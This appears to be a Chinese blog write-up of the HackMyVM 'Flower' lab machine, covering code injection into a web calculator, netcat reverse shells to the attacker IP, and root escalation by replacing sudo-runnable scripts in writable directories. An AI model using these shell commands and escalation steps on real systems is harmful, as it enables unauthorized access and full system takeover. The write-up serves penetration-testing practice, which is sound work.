Loading

[HMV] Flower

0x00 配置

攻击机 IP: 172.16.1.25

靶机 IP: 172.16.1.36


0x01 攻击

使用 Nmap 扫描目标靶机开放的端口

┌──(root㉿Kali-VM)-[~]
└─# nmap -sC -sV -p- 172.16.1.36 
Starting Nmap 7.93 ( https://nmap.org )
Nmap scan report for 172.16.1.36
Host is up (0.00065s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:3D:52:2E (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.18 seconds

只发现了 80 端口,打开网页查看

image-20230403082123589

image-20230403082227857

发现网页会计算提交的算式,源码中的 value 部分就是经过 BASE64 编码的算式。尝试在这里使用 system 方法执行 Shell

image-20230403082326853

在攻击机开启监听后发送请求,成功接收到了反弹 Shell

┌──(root㉿Kali-VM)-[~]
└─# nc -lvnp 5001
listening on [any] 5001 ...
connect to [172.16.1.25] from (UNKNOWN) [172.16.1.36] 49236
python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@flower:/var/www/html$ :)

接下来查看靶机中存在的用户

www-data@flower:/var/www/html$ cat /etc/passwd | grep /bin/bash
cat /etc/passwd | grep /bin/bash
root:x:0:0:root:/root:/bin/bash
rose:x:1000:1000:rose,,,:/home/rose:/bin/bash

发现了一个 rose 用户,查看 rose 用户的家目录

www-data@flower:/var/www/html$ ls -al /home/rose
ls -al /home/rose
total 32
drwxrwxr-x 3 rose rose 4096 Nov 30  2020 .
drwxr-xr-x 3 root root 4096 Nov 30  2020 ..
-rw-r--r-- 1 rose rose  220 Nov 30  2020 .bash_logout
-rw-r--r-- 1 rose rose 3526 Nov 30  2020 .bashrc
-rwx------ 1 rose rose  120 Nov 30  2020 .plantbook
-rw-r--r-- 1 rose rose  807 Nov 30  2020 .profile
drwxrwxrwx 2 rose rose 4096 Nov 30  2020 diary
-rw------- 1 rose rose   20 Nov 30  2020 user.txt

发现一个有权限的 diary 文件夹,查看里面的内容

www-data@flower:/var/www/html$ ls -al /home/rose/diary
ls -al /home/rose/diary
total 12
drwxrwxrwx 2 rose rose 4096 Nov 30  2020 .
drwxrwxr-x 3 rose rose 4096 Nov 30  2020 ..
-rw-r--r-- 1 rose rose  147 Nov 30  2020 diary.py

有一个 diary.py,查看一下内容

import pickle

diary = {"November28":"i found a blue viola","December1":"i lost my blue viola"}
p = open('diary.pickle','wb')
pickle.dump(diary,p)

是一个使用 pickle 来 dump 字典内容的脚本,暂时不知道有什么用。继续查看具有 SUID 的文件

www-data@flower:/var/www/html$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/mount
/usr/bin/passwd
/usr/bin/su
/usr/bin/umount
/usr/bin/newgrp

查看可以运行的 Sudo 命令

www-data@flower:/var/www/html$ sudo -l
sudo -l
Matching Defaults entries for www-data on flower:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on flower:
    (rose) NOPASSWD: /usr/bin/python3 /home/rose/diary/diary.py

发现可以以 rose 的身份执行 /home/rose/diary/diary.py。虽然我们对于 /home/rose/diary/diary.py 只有读取权限,但是我们对它的父目录拥有完整权限,我们可以直接删掉 /home/rose/diary/diary.py,然后重建一个包含恶意代码的 diary.py

www-data@flower:/var/www/html$ rm -rf /home/rose/diary/diary.py
rm -rf /home/rose/diary/diary.py

www-data@flower:/var/www/html$ touch /home/rose/diary/diary.py
touch /home/rose/diary/diary.py

www-data@flower:/var/www/html$ echo 'import os; os.system("nc -c sh 172.16.1.25 5002")' > /home/rose/diary/diary.py
< sh 172.16.1.25 5002")' > /home/rose/diary/diary.py

www-data@flower:/var/www/html$ cat /home/rose/diary/diary.py
cat /home/rose/diary/diary.py
import os; os.system("nc -c sh 172.16.1.25 5002")

成功把 diary.py 替换成了反弹 Shell 的脚本,以 rose 用户执行这个脚本

www-data@flower:/var/www/html$ sudo -u rose /usr/bin/python3 /home/rose/diary/diary.py

在攻击机接收到了反弹 Shell

┌──(root㉿Kali-VM)-[~]
└─# nc -lvnp 5002
listening on [any] 5002 ...
connect to [172.16.1.25] from (UNKNOWN) [172.16.1.36] 44728
python3 -c 'import pty; pty.spawn("/bin/bash")'
rose@flower:/var/www/html$ :)

先拿到 user flag

rose@flower:/var/www/html$ cd
cd

rose@flower:~$ ls -al
ls -al
total 32
drwxrwxr-x 3 rose rose 4096 Nov 30  2020 .
drwxr-xr-x 3 root root 4096 Nov 30  2020 ..
-rw-r--r-- 1 rose rose  220 Nov 30  2020 .bash_logout
-rw-r--r-- 1 rose rose 3526 Nov 30  2020 .bashrc
-rwx------ 1 rose rose  120 Nov 30  2020 .plantbook
-rw-r--r-- 1 rose rose  807 Nov 30  2020 .profile
drwxrwxrwx 2 rose rose 4096 Apr  2 20:11 diary
-rw------- 1 rose rose   20 Nov 30  2020 user.txt

rose@flower:~$ cat user.txt
cat user.txt
HMV{R0ses_are_R3d$}

然后寻找提权的方法。查看 rose 用户可以运行的 Sudo 命令

rose@flower:~$ sudo -l
sudo -l
Matching Defaults entries for rose on flower:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User rose may run the following commands on flower:
    (root) NOPASSWD: /bin/bash /home/rose/.plantbook

发现可以以 root 身份运行 /home/rose/.plantbook,查看 /home/rose/.plantbook 是什么类型的文件

rose@flower:~$ file ./.plantbook
file ./.plantbook
./.plantbook: Bourne-Again shell script, ASCII text executable

发现是一个普通的纯文本脚本,查看一下脚本内容

rose@flower:~$ cat ./.plantbook
cat ./.plantbook
#!/bin/bash
echo Hello, write the name of the flower that u found
read flower
echo Nice, $flower submitted on : $(date)

没有可以利用的地方,不过因为我们对目录拥有权限,依旧可以和 www 用户提权时一样,直接删掉这个脚本,然后重建一个恶意脚本

rose@flower:~$ rm -rf ./.plantbook
rm -rf ./.plantbook

rose@flower:~$ touch ./.plantbook
touch ./.plantbook

rose@flower:~$ echo "/bin/bash" > ./.plantbook
echo "/bin/bash" > ./.plantbook

rose@flower:~$ chmod +x ./.plantbook
chmod +x ./.plantbook

现在 .plantbook 脚本就被替换成了开启 bash 的脚本,以 root 身份执行脚本

rose@flower:~$ sudo /bin/bash /home/rose/.plantbook
sudo /bin/bash /home/rose/.plantbook

root@flower:/home/rose# cd
cd

root@flower:~# ls -al
ls -al
total 24
drwx------  3 root root 4096 Nov 30  2020 .
drwxr-xr-x 18 root root 4096 Nov 30  2020 ..
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
drwxr-xr-x  3 root root 4096 Nov 30  2020 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-------  1 root root   27 Nov 30  2020 root.txt

root@flower:~# cat root.txt
cat root.txt
HMV{R0ses_are_als0_black.}

成功获得 root flag


0x02 总结

不难的靶机,只有一开始在网页上通过 system 方法运行代码的需要一点点脑洞

posted @ 2023-04-03 08:33  20206675  阅读(207)  评论(0编辑  收藏  举报